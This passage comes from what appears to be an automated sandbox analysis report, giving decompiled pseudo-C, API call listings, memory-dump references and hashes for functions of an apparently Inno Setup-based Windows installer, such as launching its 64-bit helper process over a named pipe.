				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040E9E0(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}












                                                                    0x0040d75c
                                                                    0x0040d75e
                                                                    0x0040d762
                                                                    0x0040d772
                                                                    0x0040d77b
                                                                    0x0040d780
                                                                    0x0040d782
                                                                    0x0040d787
                                                                    0x0040d78c
                                                                    0x0040d78c
                                                                    0x0040d787
                                                                    0x0040d79a

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772
                                                                      • Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                      • Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileModuleName$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 4113206344-0
                                                                    • Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                    • Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
                                                                    • Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                    • Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C68A4, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005C68A4(void* __eax) {
				signed char _t7;

				_t7 = GetFileAttributesW(E0040B278(__eax)); // executed
				if(_t7 == 0xffffffff || (_t7 & 0x00000010) == 0 || (_t7 & 0x00000004) != 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                    0x005c68af
                                                                    0x005c68b7
                                                                    0x005c68c5
                                                                    0x005c68c6
                                                                    0x005c68c9
                                                                    0x005c68c9

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,0060C4A9,00000000,0060C4C2,?,?,00000000), ref: 005C68AF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
                                                                    • Instruction ID: d55d13c6b4de8628cf529bab2b0a17402205638270c5277f1e7dff5d9331f337
                                                                    • Opcode Fuzzy Hash: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
                                                                    • Instruction Fuzzy Hash: 75D012A034520019DE1455FE19F9F5907C45F85325B140B6EB965D51E2D3298F9B1059
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042B8A3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 50%
                                                                    			E0042B8A3() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(0x42b8c1);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}






                                                                    0x0042b8a5
                                                                    0x0042b8a8
                                                                    0x0042b8ab
                                                                    0x0042b8b4
                                                                    0x0042b8b9

                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(?,0042B8C1), ref: 0042B8B4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                                    • Instruction ID: 1e160e63f6e1d4a3e736ac7d2d169814141797cfe1ada65cb98a64290c0f9c9c
                                                                    • Opcode Fuzzy Hash: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                                    • Instruction Fuzzy Hash: 9CB09B76F0C2005DA709B695745146C67D8EBC47103E148A7F404C2540D57C5444451C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006ACE20, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006ACE20() {
				struct HINSTANCE__* _t2;

				 *0x6d68a8 = 0;
				if( *0x6d68a4 != 0) {
					_t2 =  *0x6d68a4; // 0x0
					FreeLibrary(_t2); // executed
					 *0x6d68a4 = 0;
					return 0;
				}
				return 0;
			}




                                                                    0x006ace22
                                                                    0x006ace2e
                                                                    0x006ace30
                                                                    0x006ace36
                                                                    0x006ace3d
                                                                    0x00000000
                                                                    0x006ace3d
                                                                    0x006ace42

                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                                    • Instruction ID: 0a261b708251fa214c00368c1c1d02b101a55c617d2dc256ba4673a2d64f6cb6
                                                                    • Opcode Fuzzy Hash: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                                    • Instruction Fuzzy Hash: 0DC002B0D131009ECF40DF7CDE45B4237E6A704305F081427F905C61A4D6344440EB24
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004103B4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004103B4() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}





                                                                    0x004103b8
                                                                    0x004103c4

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                                    • Instruction ID: dd27519167a78a1d4504dc33fea54df0b767f1302367e86ea931617165e635a5
                                                                    • Opcode Fuzzy Hash: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                                    • Instruction Fuzzy Hash: FAA012144089000ACC04F7194C4340B35905D40114FC40668745CA92C3E61985644ADB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0047845C, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D62F8,00000000,00000000,?,00478693,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 0047847A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                                    • Instruction ID: 21ed9f25b44590dd6a88678dd2699128a8c8abd14296acda62ee9fdc78064473
                                                                    • Opcode Fuzzy Hash: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                                    • Instruction Fuzzy Hash: F6114C746813069BC710DF19C880B86B7E5EB98350F10C53AE96C9F385E7B4E904CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004056E8, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                                    • Instruction ID: 671f966e8e8ef53a1d331dc007cdee3d18c8d913abcb1f2bfacacf6af6d793b4
                                                                    • Opcode Fuzzy Hash: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                                    • Instruction Fuzzy Hash: 9CF0AFF2B003018FD7549FB89D40B12BBD6E708354F20413EE90DEB794D7B088008B88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00625754, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 187pipeprocessfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 82%
                                                                    			E00625754(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v12;
				char _v16;
				void* _v20;
				void* _v24;
				long _v28;
				struct _STARTUPINFOW _v96;
				struct _PROCESS_INFORMATION _v112;
				char _v116;
				long _v120;
				char _v124;
				long _v128;
				char _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				void* _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char* _t62;
				WCHAR* _t91;
				WCHAR* _t97;
				intOrPtr _t98;
				void* _t127;
				intOrPtr _t139;
				struct _FILETIME* _t141;
				void* _t145;
				void* _t146;
				intOrPtr _t147;

				_t145 = _t146;
				_t147 = _t146 + 0xffffff4c;
				_v156 = 0;
				_v160 = 0;
				_v16 = 0;
				_t127 = __eax;
				_t141 =  &_v12;
				_push(_t145);
				_push(0x625a4f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				E00616130(L"Starting 64-bit helper process.", __eax, _t141, 0x6d636c);
				_t62 =  *0x6cda20; // 0x6d67dd
				if( *_t62 == 0) {
					E0060CD28(L"Cannot utilize 64-bit features on this version of Windows", _t127);
				}
				if( *0x6d6368 == 0) {
					E0060CD28(L"64-bit helper EXE wasn\'t extracted", _t127);
				}
				while(1) {
					 *0x6d636c =  *0x6d636c + 1;
					 *((intOrPtr*)(_t127 + 0x14)) = GetTickCount();
					if(QueryPerformanceCounter(_t141) == 0) {
						GetSystemTimeAsFileTime(_t141);
					}
					_v152 = GetCurrentProcessId();
					_v148 = 0;
					_v144 =  *0x6d636c;
					_v140 = 0;
					_v136 =  *((intOrPtr*)(_t127 + 0x14));
					_v132 = 0;
					_v128 = _t141->dwHighDateTime;
					_v124 = 0;
					_v120 = _t141->dwLowDateTime;
					_v116 = 0;
					E004244F8(L"\\\\.\\pipe\\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x", 4,  &_v152,  &_v16);
					_v20 = CreateNamedPipeW(E0040B278(_v16), 0x40080003, 6, 1, 0x2000, 0x2000, 0, 0);
					if(_v20 != 0xffffffff) {
						break;
					}
					if(GetLastError() != 0xe7) {
						E0060CE84(L"CreateNamedPipe");
					}
				}
				_push(_t145);
				_push(0x625a0b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				_v24 = CreateFileW(E0040B278(_v16), 0xc0000000, 0, 0x6cd098, 3, 0, 0);
				if(_v24 == 0xffffffff) {
					E0060CE84(L"CreateFile");
				}
				_push(_t145);
				_push(0x6259fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				_v28 = 2;
				if(SetNamedPipeHandleState(_v24,  &_v28, 0, 0) == 0) {
					E0060CE84(L"SetNamedPipeHandleState");
				}
				E00407760( &_v96, 0x44);
				_v96.cb = 0x44;
				E005C745C( &_v156);
				_t91 = E0040B278(_v156);
				_v176 = 0x69;
				_v172 = 0;
				_v168 = _v24;
				_v164 = 0;
				E004244F8(L"helper %d 0x%x", 1,  &_v176,  &_v160);
				_t97 = E0040B278(_v160);
				_t98 =  *0x6d6368; // 0x0
				if(CreateProcessW(E0040B278(_t98), _t97, 0, 0, 0xffffffff, 0xc000000, 0, _t91,  &_v96,  &_v112) == 0) {
					E0060CE84(L"CreateProcess");
				}
				 *((char*)(_t127 + 4)) = 1;
				 *((char*)(_t127 + 5)) = 0;
				 *(_t127 + 8) = _v112.hProcess;
				 *((intOrPtr*)(_t127 + 0x10)) = _v112.dwProcessId;
				 *((intOrPtr*)(_t127 + 0xc)) = _v20;
				_v20 = 0;
				CloseHandle(_v112.hThread);
				_v184 =  *((intOrPtr*)(_t127 + 0x10));
				_v180 = 0;
				E006163B4(L"Helper process PID: %u", _t127, 0,  &_v184, _t141, 0x6d636c);
				_pop(_t139);
				 *[fs:eax] = _t139;
				_push(E00625A01);
				return CloseHandle(_v24);
			}






































                                                                    0x00625755
                                                                    0x00625757
                                                                    0x00625762
                                                                    0x00625768
                                                                    0x0062576e
                                                                    0x00625771
                                                                    0x00625778
                                                                    0x0062577d
                                                                    0x0062577e
                                                                    0x00625783
                                                                    0x00625786
                                                                    0x0062578e
                                                                    0x00625793
                                                                    0x0062579b
                                                                    0x006257a2
                                                                    0x006257a2
                                                                    0x006257ae
                                                                    0x006257b5
                                                                    0x006257b5
                                                                    0x006257ba
                                                                    0x006257ba
                                                                    0x006257c1
                                                                    0x006257cc
                                                                    0x006257cf
                                                                    0x006257cf
                                                                    0x006257dd
                                                                    0x006257e3
                                                                    0x006257ec
                                                                    0x006257f2
                                                                    0x006257fc
                                                                    0x00625802
                                                                    0x00625809
                                                                    0x0062580c
                                                                    0x00625812
                                                                    0x00625815
                                                                    0x00625829
                                                                    0x00625853
                                                                    0x0062585a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00625866
                                                                    0x00625871
                                                                    0x00625871
                                                                    0x00625866
                                                                    0x0062587d
                                                                    0x0062587e
                                                                    0x00625883
                                                                    0x00625886
                                                                    0x006258a9
                                                                    0x006258b0
                                                                    0x006258b7
                                                                    0x006258b7
                                                                    0x006258be
                                                                    0x006258bf
                                                                    0x006258c4
                                                                    0x006258c7
                                                                    0x006258ca
                                                                    0x006258e4
                                                                    0x006258eb
                                                                    0x006258eb
                                                                    0x006258fa
                                                                    0x006258ff
                                                                    0x00625914
                                                                    0x0062591f
                                                                    0x00625939
                                                                    0x00625943
                                                                    0x0062594d
                                                                    0x00625953
                                                                    0x0062596a
                                                                    0x00625975
                                                                    0x0062597b
                                                                    0x0062598d
                                                                    0x00625994
                                                                    0x00625994
                                                                    0x00625999
                                                                    0x0062599d
                                                                    0x006259a4
                                                                    0x006259aa
                                                                    0x006259b0
                                                                    0x006259b5
                                                                    0x006259bc
                                                                    0x006259c4
                                                                    0x006259ca
                                                                    0x006259de
                                                                    0x006259e5
                                                                    0x006259e8
                                                                    0x006259eb
                                                                    0x006259f9

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 006257BC
                                                                    • QueryPerformanceCounter.KERNEL32(00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257C5
                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006257CF
                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257D8
                                                                    • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062584E
                                                                    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062585C
                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006258A4
                                                                    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,006259FA,?,00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B), ref: 006258DD
                                                                      • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                    • CreateProcessW.KERNEL32 ref: 00625986
                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006259BC
                                                                    • CloseHandle.KERNEL32(000000FF,00625A01,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 006259F4
                                                                      • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                    • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                    • API String ID: 770386003-3271284199
                                                                    • Opcode ID: 05f0d23c42287ecae2e57217e457ed2ec46126e3f6ae7872c277f0bd952ed0eb
                                                                    • Instruction ID: 34d3d620ae4a6a58b4d890a55742d975a8112a0372845dc610fa96f79e58b5cb
                                                                    • Opcode Fuzzy Hash: 05f0d23c42287ecae2e57217e457ed2ec46126e3f6ae7872c277f0bd952ed0eb
                                                                    • Instruction Fuzzy Hash: 21717F70E407589EDB20EFB9DC46B9EBBB6EF09304F1041A9F509EB282D77499408F65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006A60E8, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E006A60E8(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				DWORD* _v16;
				struct _SHELLEXECUTEINFOW _v76;
				long _t41;
				intOrPtr _t69;
				void* _t71;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
